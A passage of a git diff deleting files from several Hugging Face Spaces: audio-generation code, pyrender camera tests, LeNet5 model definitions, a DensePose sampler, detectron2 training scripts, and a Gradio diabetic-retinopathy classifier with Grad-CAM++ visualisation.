prompt_sample_rate (int): Sampling rate of the given audio waveforms. - descriptions (tp.List[str], optional): A list of strings used as text conditioning. Defaults to None. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - """ - if prompt.dim() == 2: - prompt = prompt[None] - if prompt.dim() != 3: - raise ValueError("prompt should have 3 dimensions: [B, C, T] (C = 1).") - prompt = convert_audio(prompt, prompt_sample_rate, self.sample_rate, self.audio_channels) - if descriptions is None: - descriptions = [None] * len(prompt) - attributes, prompt_tokens = self._prepare_tokens_and_attributes(descriptions, prompt) - assert prompt_tokens is not None - return self._generate_tokens(attributes, prompt_tokens, progress) - - @torch.no_grad() - def _prepare_tokens_and_attributes( - self, - descriptions: tp.Sequence[tp.Optional[str]], - prompt: tp.Optional[torch.Tensor], - melody_wavs: tp.Optional[MelodyList] = None, - ) -> tp.Tuple[tp.List[ConditioningAttributes], tp.Optional[torch.Tensor]]: - """Prepare model inputs. - - Args: - descriptions (tp.List[str]): A list of strings used as text conditioning. - prompt (torch.Tensor): A batch of waveforms used for continuation. - melody_wavs (tp.Optional[torch.Tensor], optional): A batch of waveforms - used as melody conditioning. Defaults to None. - """ - attributes = [ - ConditioningAttributes(text={'description': description}) - for description in descriptions] - - if melody_wavs is None: - for attr in attributes: - attr.wav['self_wav'] = WavCondition( - torch.zeros((1, 1), device=self.device), - torch.tensor([0], device=self.device), - path='null_wav') # type: ignore - else: - if self.name != "melody": - raise RuntimeError("This model doesn't support melody conditioning. " - "Use the `melody` model.") - assert len(melody_wavs) == len(descriptions), \ - f"number of melody wavs must match number of descriptions! " \ - f"got melody len={len(melody_wavs)}, and descriptions len={len(descriptions)}" - for attr, melody in zip(attributes, melody_wavs): - if melody is None: - attr.wav['self_wav'] = WavCondition( - torch.zeros((1, 1), device=self.device), - torch.tensor([0], device=self.device), - path='null_wav') # type: ignore - else: - attr.wav['self_wav'] = WavCondition( - melody.to(device=self.device), - torch.tensor([melody.shape[-1]], device=self.device)) - - if prompt is not None: - if descriptions is not None: - assert len(descriptions) == len(prompt), "Prompt and nb. descriptions doesn't match" - prompt = prompt.to(self.device) - prompt_tokens, scale = self.compression_model.encode(prompt) - assert scale is None - else: - prompt_tokens = None - return attributes, prompt_tokens - - def _generate_tokens(self, attributes: tp.List[ConditioningAttributes], - prompt_tokens: tp.Optional[torch.Tensor], progress: bool = False) -> torch.Tensor: - """Generate discrete audio tokens given audio prompt and/or conditions. - - Args: - attributes (tp.List[ConditioningAttributes]): Conditions used for generation (text/melody). - prompt_tokens (tp.Optional[torch.Tensor]): Audio prompt used for continuation. - progress (bool, optional): Flag to display progress of the generation process. Defaults to False. - Returns: - torch.Tensor: Generated audio, of shape [B, C, T], T is defined by the generation params. - """ - total_gen_len = int(self.duration * self.frame_rate) - max_prompt_len = int(min(self.duration, self.max_duration) * self.frame_rate) - current_gen_offset: int = 0 - - def _progress_callback(generated_tokens: int, tokens_to_generate: int): - generated_tokens += current_gen_offset - if self._progress_callback is not None: - # Note that total_gen_len might be quite wrong depending on the - # codebook pattern used, but with delay it is almost accurate. - self._progress_callback(generated_tokens, total_gen_len) - else: - print(f'{generated_tokens: 6d} / {total_gen_len: 6d}', end='\r') - - if prompt_tokens is not None: - assert max_prompt_len >= prompt_tokens.shape[-1], \ - "Prompt is longer than audio to generate" - - callback = None - if progress: - callback = _progress_callback - - if self.duration <= self.max_duration: - # generate by sampling from LM, simple case. - with self.autocast: - gen_tokens = self.lm.generate( - prompt_tokens, attributes, - callback=callback, max_gen_len=total_gen_len, **self.generation_params) - - else: - # now this gets a bit messier, we need to handle prompts, - # melody conditioning etc. - ref_wavs = [attr.wav['self_wav'] for attr in attributes] - all_tokens = [] - if prompt_tokens is None: - prompt_length = 0 - else: - all_tokens.append(prompt_tokens) - prompt_length = prompt_tokens.shape[-1] - - stride_tokens = int(self.frame_rate * self.extend_stride) - - while current_gen_offset + prompt_length < total_gen_len: - time_offset = current_gen_offset / self.frame_rate - chunk_duration = min(self.duration - time_offset, self.max_duration) - max_gen_len = int(chunk_duration * self.frame_rate) - for attr, ref_wav in zip(attributes, ref_wavs): - wav_length = ref_wav.length.item() - if wav_length == 0: - continue - # We will extend the wav periodically if it not long enough. - # we have to do it here rather than in conditioners.py as otherwise - # we wouldn't have the full wav. - initial_position = int(time_offset * self.sample_rate) - wav_target_length = int(self.max_duration * self.sample_rate) - print(initial_position / self.sample_rate, wav_target_length / self.sample_rate) - positions = torch.arange(initial_position, - initial_position + wav_target_length, device=self.device) - attr.wav['self_wav'] = WavCondition( - ref_wav[0][:, positions % wav_length], - torch.full_like(ref_wav[1], wav_target_length)) - with self.autocast: - gen_tokens = self.lm.generate( - prompt_tokens, attributes, - callback=callback, max_gen_len=max_gen_len, **self.generation_params) - if prompt_tokens is None: - all_tokens.append(gen_tokens) - else: - all_tokens.append(gen_tokens[:, :, prompt_tokens.shape[-1]:]) - prompt_tokens = gen_tokens[:, :, stride_tokens:] - prompt_length = prompt_tokens.shape[-1] - current_gen_offset += stride_tokens - - gen_tokens = torch.cat(all_tokens, dim=-1) - - # generate audio - assert gen_tokens.dim() == 3 - with torch.no_grad(): - gen_audio = self.compression_model.decode(gen_tokens, None) - return gen_audio diff --git a/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py b/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py deleted file mode 100644 index 7544ad8f8e3ee55236fd2e32dbc12065153cbe5b..0000000000000000000000000000000000000000 --- a/spaces/brjathu/HMR2.0/vendor/pyrender/tests/unit/test_cameras.py +++ /dev/null @@ -1,164 +0,0 @@ -import numpy as np -import pytest - -from pyrender import PerspectiveCamera, OrthographicCamera - - -def test_perspective_camera(): - - # Set up constants - znear = 0.05 - zfar = 100 - yfov = np.pi / 3.0 - width = 1000.0 - height = 500.0 - aspectRatio = 640.0 / 480.0 - - # Test basics - with pytest.raises(TypeError): - p = PerspectiveCamera() - - p = PerspectiveCamera(yfov=yfov) - assert p.yfov == yfov - assert p.znear == 0.05 - assert p.zfar is None - assert p.aspectRatio is None - p.name = 'asdf' - p.name = None - - with pytest.raises(ValueError): - p.yfov = 0.0 - - with pytest.raises(ValueError): - p.yfov = -1.0 - - with pytest.raises(ValueError): - p.znear = -1.0 - - p.znear = 0.0 - p.znear = 0.05 - p.zfar = 100.0 - assert p.zfar == 100.0 - - with pytest.raises(ValueError): - p.zfar = 0.03 - - with pytest.raises(ValueError): - p.zfar = 0.05 - - p.aspectRatio = 10.0 - assert p.aspectRatio == 10.0 - - with pytest.raises(ValueError): - p.aspectRatio = 0.0 - - with pytest.raises(ValueError): - p.aspectRatio = -1.0 - - # Test matrix getting/setting - - # NF - p.znear = 0.05 - p.zfar = 100 - p.aspectRatio = None - - with pytest.raises(ValueError): - p.get_projection_matrix() - - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (width / height * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - [0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, (zfar + znear) / (znear - zfar), - (2 * zfar * znear) / (znear - zfar)], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - - # NFA - p.aspectRatio = aspectRatio - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (aspectRatio * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - [0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, (zfar + znear) / (znear - zfar), - (2 * zfar * znear) / (znear - zfar)], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - assert np.allclose( - p.get_projection_matrix(), p.get_projection_matrix(width, height) - ) - - # N - p.zfar = None - p.aspectRatio = None - assert np.allclose( - p.get_projection_matrix(width, height), - np.array([ - [1.0 / (width / height * np.tan(yfov / 2.0)), 0.0, 0.0, 0.0], - [0.0, 1.0 / np.tan(yfov / 2.0), 0.0, 0.0], - [0.0, 0.0, -1.0, -2.0 * znear], - [0.0, 0.0, -1.0, 0.0] - ]) - ) - - -def test_orthographic_camera(): - xm = 1.0 - ym = 2.0 - n = 0.05 - f = 100.0 - - with pytest.raises(TypeError): - c = OrthographicCamera() - - c = OrthographicCamera(xmag=xm, ymag=ym) - - assert c.xmag == xm - assert c.ymag == ym - assert c.znear == 0.05 - assert c.zfar == 100.0 - assert c.name is None - - with pytest.raises(TypeError): - c.ymag = None - - with pytest.raises(ValueError): - c.ymag = 0.0 - - with pytest.raises(ValueError): - c.ymag = -1.0 - - with pytest.raises(TypeError): - c.xmag = None - - with pytest.raises(ValueError): - c.xmag = 0.0 - - with pytest.raises(ValueError): - c.xmag = -1.0 - - with pytest.raises(TypeError): - c.znear = None - - with pytest.raises(ValueError): - c.znear = 0.0 - - with pytest.raises(ValueError): - c.znear = -1.0 - - with pytest.raises(ValueError): - c.zfar = 0.01 - - assert np.allclose( - c.get_projection_matrix(), - np.array([ - [1.0 / xm, 0, 0, 0], - [0, 1.0 / ym, 0, 0], - [0, 0, 2.0 / (n - f), (f + n) / (n - f)], - [0, 0, 0, 1.0] - ]) - ) diff --git a/spaces/camenduru-com/seamless/index.html b/spaces/camenduru-com/seamless/index.html deleted file mode 100644 index 1e8aecdea8a3bbaddfc715d5a7b4c33ec2b7d394..0000000000000000000000000000000000000000 --- a/spaces/camenduru-com/seamless/index.html +++ /dev/null @@ -1,119 +0,0 @@ - - - - - - Unity WebGL Player | seamless - - - - -
- -
- -
-
-
-
-
- -
- - - diff --git a/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py b/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py deleted file mode 100644 index 79c0e8421383bf60420c8bfa5c3a70d42bf42915..0000000000000000000000000000000000000000 --- a/spaces/cancanasoyak/CropBased-TissueMasking/Deployment/model/LeNet5_different_inputSizes.py +++ /dev/null @@ -1,115 +0,0 @@ -import torch -import torch.nn as nn - -############################################################################################################### -class LeNet5_128(nn.Module): - def __init__(self): - super(LeNet5_128, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 128x128 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 128x128 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 32 * 32 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x -############################################################################################################### -class LeNet5_64(nn.Module): - def __init__(self): - super(LeNet5_64, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 64x64 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 64x64 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 16 * 16 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x -############################################################################################################### -class LeNet5_32(nn.Module): - def __init__(self): - super(LeNet5_32, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 32x32 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 32x32 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 8 * 8 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x -############################################################################################################### -class LeNet5_16(nn.Module): - def __init__(self): - super(LeNet5_16, self).__init__() - self.conv1 = nn.Conv2d(3, 6, kernel_size=5, padding=2) # Adjust padding for 16x16 input - self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2) - - self.conv2 = nn.Conv2d(6, 16, kernel_size=5, padding=2) # Adjust padding for 16x16 input - self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2) - - # Calculate the size of the output after convolution and pooling - self.fc1_input_size = 16 * 4 * 4 # Adjust based on the new output size - self.fc1 = nn.Linear(self.fc1_input_size, 120) - self.fc2 = nn.Linear(120, 84) - self.fc3 = nn.Linear(84, 2) - - def forward(self, x): - x = self.pool1(torch.relu(self.conv1(x))) - x = self.pool2(torch.relu(self.conv2(x))) - x = x.view(-1, self.fc1_input_size) # Adjust based on the new output size - x = torch.relu(self.fc1(x)) - x = torch.relu(self.fc2(x)) - x = self.fc3(x) - return x - -############################################################################################################### -############################################################################################################### - -# Function to select the appropriate model based on input size -def select_model(input_size): - if input_size == 128: - return LeNet5_128() - elif input_size == 64: - return LeNet5_64() - elif input_size == 32: - return LeNet5_32() - elif input_size == 16: - return LeNet5_16() - else: - raise ValueError("Unsupported input size") \ No newline at end of file diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py deleted file mode 100644 index 964b7f4ac41d2e1bb3da1cf6861af7f644b859fc..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/DensePose/densepose/data/samplers/densepose_cse_confidence_based.py +++ /dev/null @@ -1,119 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. - -import random -from typing import Optional, Tuple -import torch -from torch.nn import functional as F - -from detectron2.config import CfgNode -from detectron2.structures import Instances - -from densepose.converters.base import IntTupleBox - -from .densepose_cse_base import DensePoseCSEBaseSampler - - -class DensePoseCSEConfidenceBasedSampler(DensePoseCSEBaseSampler): - """ - Samples DensePose data from DensePose predictions. - Samples for each class are drawn using confidence value estimates. - """ - - def __init__( - self, - cfg: CfgNode, - use_gt_categories: bool, - embedder: torch.nn.Module, - confidence_channel: str, - count_per_class: int = 8, - search_count_multiplier: Optional[float] = None, - search_proportion: Optional[float] = None, - ): - """ - Constructor - - Args: - cfg (CfgNode): the config of the model - embedder (torch.nn.Module): necessary to compute mesh vertex embeddings - confidence_channel (str): confidence channel to use for sampling; - possible values: - "coarse_segm_confidence": confidences for coarse segmentation - (default: "coarse_segm_confidence") - count_per_class (int): the sampler produces at most `count_per_class` - samples for each category (default: 8) - search_count_multiplier (float or None): if not None, the total number - of the most confident estimates of a given class to consider is - defined as `min(search_count_multiplier * count_per_class, N)`, - where `N` is the total number of estimates of the class; cannot be - specified together with `search_proportion` (default: None) - search_proportion (float or None): if not None, the total number of the - of the most confident estimates of a given class to consider is - defined as `min(max(search_proportion * N, count_per_class), N)`, - where `N` is the total number of estimates of the class; cannot be - specified together with `search_count_multiplier` (default: None) - """ - super().__init__(cfg, use_gt_categories, embedder, count_per_class) - self.confidence_channel = confidence_channel - self.search_count_multiplier = search_count_multiplier - self.search_proportion = search_proportion - assert (search_count_multiplier is None) or (search_proportion is None), ( - f"Cannot specify both search_count_multiplier (={search_count_multiplier})" - f"and search_proportion (={search_proportion})" - ) - - def _produce_index_sample(self, values: torch.Tensor, count: int): - """ - Produce a sample of indices to select data based on confidences - - Args: - values (torch.Tensor): a tensor of length k that contains confidences - k: number of points labeled with part_id - count (int): number of samples to produce, should be positive and <= k - - Return: - list(int): indices of values (along axis 1) selected as a sample - """ - k = values.shape[1] - if k == count: - index_sample = list(range(k)) - else: - # take the best count * search_count_multiplier pixels, - # sample from them uniformly - # (here best = smallest variance) - _, sorted_confidence_indices = torch.sort(values[0]) - if self.search_count_multiplier is not None: - search_count = min(int(count * self.search_count_multiplier), k) - elif self.search_proportion is not None: - search_count = min(max(int(k * self.search_proportion), count), k) - else: - search_count = min(count, k) - sample_from_top = random.sample(range(search_count), count) - index_sample = sorted_confidence_indices[-search_count:][sample_from_top] - return index_sample - - def _produce_mask_and_results( - self, instance: Instances, bbox_xywh: IntTupleBox - ) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]: - """ - Method to get labels and DensePose results from an instance - - Args: - instance (Instances): an instance of - `DensePoseEmbeddingPredictorOutputWithConfidences` - bbox_xywh (IntTupleBox): the corresponding bounding box - - Return: - mask (torch.Tensor): shape [H, W], DensePose segmentation mask - embeddings (Tuple[torch.Tensor]): a tensor of shape [D, H, W] - DensePose CSE Embeddings - other_values: a tensor of shape [1, H, W], DensePose CSE confidence - """ - _, _, w, h = bbox_xywh - densepose_output = instance.pred_densepose - mask, embeddings, _ = super()._produce_mask_and_results(instance, bbox_xywh) - other_values = F.interpolate( - getattr(densepose_output, self.confidence_channel), - size=(h, w), - mode="bilinear", - )[0].cpu() - return mask, embeddings, other_values diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py deleted file mode 100644 index 222dfddffb1f9bedf87f4c345534045b29e2d8ee..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/projects/Rethinking-BatchNorm/configs/retinanet_SyncBNhead.py +++ /dev/null @@ -1,19 +0,0 @@ -from detectron2.model_zoo import get_config -from torch import nn - -model = get_config("common/models/retinanet.py").model -model.backbone.bottom_up.freeze_at = 2 - -# The head will overwrite string "SyncBN" to use domain-specific BN, so we -# provide a class here to use shared BN in training. -model.head.norm = nn.SyncBatchNorm2d - -dataloader = get_config("common/data/coco.py").dataloader -lr_multiplier = get_config("common/coco_schedule.py").lr_multiplier_3x -optimizer = get_config("common/optim.py").SGD -train = get_config("common/train.py").train - -optimizer.lr = 0.01 - -train.init_checkpoint = "detectron2://ImageNetPretrained/MSRA/R-50.pkl" -train.max_iter = 270000 # 3x for batchsize = 16 diff --git a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py b/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py deleted file mode 100644 index be4588e559816727635ce287281df3d41514a8cc..0000000000000000000000000000000000000000 --- a/spaces/carlosalonso/Detection-video/carpeta_deteccion/tools/plain_train_net.py +++ /dev/null @@ -1,217 +0,0 @@ -#!/usr/bin/env python -# Copyright (c) Facebook, Inc. and its affiliates. -""" -Detectron2 training script with a plain training loop. - -This script reads a given config file and runs the training or evaluation. -It is an entry point that is able to train standard models in detectron2. - -In order to let one script support training of many models, -this script contains logic that are specific to these built-in models and therefore -may not be suitable for your own project. -For example, your research project perhaps only needs a single "evaluator". - -Therefore, we recommend you to use detectron2 as a library and take -this file as an example of how to use the library. -You may want to write your own script with your datasets and other customizations. - -Compared to "train_net.py", this script supports fewer default features. -It also includes fewer abstraction, therefore is easier to add custom logic. -""" - -import logging -import os -from collections import OrderedDict -import torch -from torch.nn.parallel import DistributedDataParallel - -import detectron2.utils.comm as comm -from detectron2.checkpoint import DetectionCheckpointer, PeriodicCheckpointer -from detectron2.config import get_cfg -from detectron2.data import ( - MetadataCatalog, - build_detection_test_loader, - build_detection_train_loader, -) -from detectron2.engine import default_argument_parser, default_setup, default_writers, launch -from detectron2.evaluation import ( - CityscapesInstanceEvaluator, - CityscapesSemSegEvaluator, - COCOEvaluator, - COCOPanopticEvaluator, - DatasetEvaluators, - LVISEvaluator, - PascalVOCDetectionEvaluator, - SemSegEvaluator, - inference_on_dataset, - print_csv_format, -) -from detectron2.modeling import build_model -from detectron2.solver import build_lr_scheduler, build_optimizer -from detectron2.utils.events import EventStorage - -logger = logging.getLogger("detectron2") - - -def get_evaluator(cfg, dataset_name, output_folder=None): - """ - Create evaluator(s) for a given dataset. - This uses the special metadata "evaluator_type" associated with each builtin dataset. - For your own dataset, you can simply create an evaluator manually in your - script and do not have to worry about the hacky if-else logic here. - """ - if output_folder is None: - output_folder = os.path.join(cfg.OUTPUT_DIR, "inference") - evaluator_list = [] - evaluator_type = MetadataCatalog.get(dataset_name).evaluator_type - if evaluator_type in ["sem_seg", "coco_panoptic_seg"]: - evaluator_list.append( - SemSegEvaluator( - dataset_name, - distributed=True, - output_dir=output_folder, - ) - ) - if evaluator_type in ["coco", "coco_panoptic_seg"]: - evaluator_list.append(COCOEvaluator(dataset_name, output_dir=output_folder)) - if evaluator_type == "coco_panoptic_seg": - evaluator_list.append(COCOPanopticEvaluator(dataset_name, output_folder)) - if evaluator_type == "cityscapes_instance": - return CityscapesInstanceEvaluator(dataset_name) - if evaluator_type == "cityscapes_sem_seg": - return CityscapesSemSegEvaluator(dataset_name) - if evaluator_type == "pascal_voc": - return PascalVOCDetectionEvaluator(dataset_name) - if evaluator_type == "lvis": - return LVISEvaluator(dataset_name, cfg, True, output_folder) - if len(evaluator_list) == 0: - raise NotImplementedError( - "no Evaluator for the dataset {} with the type {}".format(dataset_name, evaluator_type) - ) - if len(evaluator_list) == 1: - return evaluator_list[0] - return DatasetEvaluators(evaluator_list) - - -def do_test(cfg, model): - results = OrderedDict() - for dataset_name in cfg.DATASETS.TEST: - data_loader = build_detection_test_loader(cfg, dataset_name) - evaluator = get_evaluator( - cfg, dataset_name, os.path.join(cfg.OUTPUT_DIR, "inference", dataset_name) - ) - results_i = inference_on_dataset(model, data_loader, evaluator) - results[dataset_name] = results_i - if comm.is_main_process(): - logger.info("Evaluation results for {} in csv format:".format(dataset_name)) - print_csv_format(results_i) - if len(results) == 1: - results = list(results.values())[0] - return results - - -def do_train(cfg, model, resume=False): - model.train() - optimizer = build_optimizer(cfg, model) - scheduler = build_lr_scheduler(cfg, optimizer) - - checkpointer = DetectionCheckpointer( - model, cfg.OUTPUT_DIR, optimizer=optimizer, scheduler=scheduler - ) - start_iter = ( - checkpointer.resume_or_load(cfg.MODEL.WEIGHTS, resume=resume).get("iteration", -1) + 1 - ) - max_iter = cfg.SOLVER.MAX_ITER - - periodic_checkpointer = PeriodicCheckpointer( - checkpointer, cfg.SOLVER.CHECKPOINT_PERIOD, max_iter=max_iter - ) - - writers = default_writers(cfg.OUTPUT_DIR, max_iter) if comm.is_main_process() else [] - - # compared to "train_net.py", we do not support accurate timing and - # precise BN here, because they are not trivial to implement in a small training loop - data_loader = build_detection_train_loader(cfg) - logger.info("Starting training from iteration {}".format(start_iter)) - with EventStorage(start_iter) as storage: - for data, iteration in zip(data_loader, range(start_iter, max_iter)): - storage.iter = iteration - - loss_dict = model(data) - losses = sum(loss_dict.values()) - assert torch.isfinite(losses).all(), loss_dict - - loss_dict_reduced = {k: v.item() for k, v in comm.reduce_dict(loss_dict).items()} - losses_reduced = sum(loss for loss in loss_dict_reduced.values()) - if comm.is_main_process(): - storage.put_scalars(total_loss=losses_reduced, **loss_dict_reduced) - - optimizer.zero_grad() - losses.backward() - optimizer.step() - storage.put_scalar("lr", optimizer.param_groups[0]["lr"], smoothing_hint=False) - scheduler.step() - - if ( - cfg.TEST.EVAL_PERIOD > 0 - and (iteration + 1) % cfg.TEST.EVAL_PERIOD == 0 - and iteration != max_iter - 1 - ): - do_test(cfg, model) - # Compared to "train_net.py", the test results are not dumped to EventStorage - comm.synchronize() - - if iteration - start_iter > 5 and ( - (iteration + 1) % 20 == 0 or iteration == max_iter - 1 - ): - for writer in writers: - writer.write() - periodic_checkpointer.step(iteration) - - -def setup(args): - """ - Create configs and perform basic setups. - """ - cfg = get_cfg() - cfg.merge_from_file(args.config_file) - cfg.merge_from_list(args.opts) - cfg.freeze() - default_setup( - cfg, args - ) # if you don't like any of the default setup, write your own setup code - return cfg - - -def main(args): - cfg = setup(args) - - model = build_model(cfg) - logger.info("Model:\n{}".format(model)) - if args.eval_only: - DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load( - cfg.MODEL.WEIGHTS, resume=args.resume - ) - return do_test(cfg, model) - - distributed = comm.get_world_size() > 1 - if distributed: - model = DistributedDataParallel( - model, device_ids=[comm.get_local_rank()], broadcast_buffers=False - ) - - do_train(cfg, model, resume=args.resume) - return do_test(cfg, model) - - -if __name__ == "__main__": - args = default_argument_parser().parse_args() - print("Command Line Args:", args) - launch( - main, - args.num_gpus, - num_machines=args.num_machines, - machine_rank=args.machine_rank, - dist_url=args.dist_url, - args=(args,), - ) diff --git a/spaces/ccaglieri/convnext_diabetic/app.py b/spaces/ccaglieri/convnext_diabetic/app.py deleted file mode 100644 index 08c7c06845b226f3349c40587b7a818699a6417e..0000000000000000000000000000000000000000 --- a/spaces/ccaglieri/convnext_diabetic/app.py +++ /dev/null @@ -1,136 +0,0 @@ -import torch -import cv2 -import torch.nn as nn -import numpy as np -from torchvision import models, transforms -import time -import os -import copy -import pickle -from PIL import Image -import datetime -import gdown -import zipfile -import urllib.request -from pytorch_grad_cam import GradCAMPlusPlus -from pytorch_grad_cam.utils.image import show_cam_on_image, preprocess_image -import gradio as gr - -IMG_SIZE = 512 -CLASSES = [ "No DR", "Mild", "Moderate", "Severe", "Proliferative DR" ] - -checkpoint = "./demo_checkpoint_convnext.pth" - -device = "cpu" -if torch.cuda.is_available(): - device = "cuda" - -model = torch.load(checkpoint, device) - -global_transforms = transforms.Compose([ - transforms.ToPILImage(), - transforms.Lambda(lambda image: image.convert('RGB')), - transforms.Resize(IMG_SIZE), - transforms.ToTensor(), - transforms.Normalize([0.2786802, 0.2786802, 0.2786802], [0.16637428, 0.16637428, 0.16637428]) - ]) - -def crop_image_from_gray(img,tol=7): - mask = img>tol - - img1=img[np.ix_(mask.any(1),mask.any(0))] - img2=img[np.ix_(mask.any(1),mask.any(0))] - img3=img[np.ix_(mask.any(1),mask.any(0))] - img = np.stack([img1,img2,img3],axis=-1) - - return img - -def circle_crop(img): - height, width = img.shape - - x = int(width/2) - y = int(height/2) - r = np.amin((x,y)) - - circle_img = np.zeros((height, width), np.uint8) - cv2.circle(circle_img, (x,y), int(r), 1, thickness=-1) - img = cv2.bitwise_and(img, img, mask=circle_img) - img = crop_image_from_gray(img) - return img - -def preprocess(img): - # Extract Green Channel - img = img[:,:,1] - #CLAHE - clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8)) - img = clahe.apply(img) - # Circle crop - img = circle_crop(img) - # Resize - img = cv2.resize(img, (IMG_SIZE,IMG_SIZE)) - - return img - -def grad_campp(img): - img = np.float32(img) / 255 - input_tensor = preprocess_image(img, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]).to(device) - - # Set target layers - target_layers = [model.features[-1]] - - # GradCAM++ - gradcampp = GradCAMPlusPlus(model=model, target_layers=target_layers) - - grayscale_gradcampp = gradcampp(input_tensor=input_tensor, targets=None , eigen_smooth=False, aug_smooth=False) - - grayscale_gradcampp = grayscale_gradcampp[0, :] - - gradcampp_image = show_cam_on_image(img, grayscale_gradcampp) - - return gradcampp_image - -def do_inference(img): - img = preprocess(img) - img_t = global_transforms(img) - batch_t = torch.unsqueeze(img_t, 0) - model.eval() - gradcam_img = grad_campp(img) - # We don't need gradients for test, so wrap in - # no_grad to save memory - with torch.no_grad(): - batch_t = batch_t.to(device) - # forward propagation - output = model( batch_t) - # get prediction - probs = torch.nn.functional.softmax(output, dim=1) - output = torch.argsort(probs, dim=1, descending=True).cpu().numpy()[0].astype(int) - probs = probs.cpu().numpy()[0] - probs = probs[output] - labels = np.array(CLASSES)[output] - return {labels[i]: round(float(probs[i]),2) for i in range(len(labels))}, gradcam_img - -im = gr.inputs.Image(shape=(512, 512), image_mode='RGB', - invert_colors=False, source="upload", - type="numpy") -title = "ConvNeXt for Diabetic Retinopathy Detection" -description = "" -examples = [['./examples/0_0.jpeg'],['./examples/0_1.png'], - ['./examples/1_0.jpeg'],['./examples/1_1.png'], - ['./examples/2_0.jpeg'],['./examples/2_1.png'], - ['./examples/3_0.jpeg'],['./examples/3_1.png'], - ['./examples/4_0.jpeg'],['./examples/4_1.png']] -#article="

Colab Recipes for Computer Vision - Dr. Mohamed Elawady

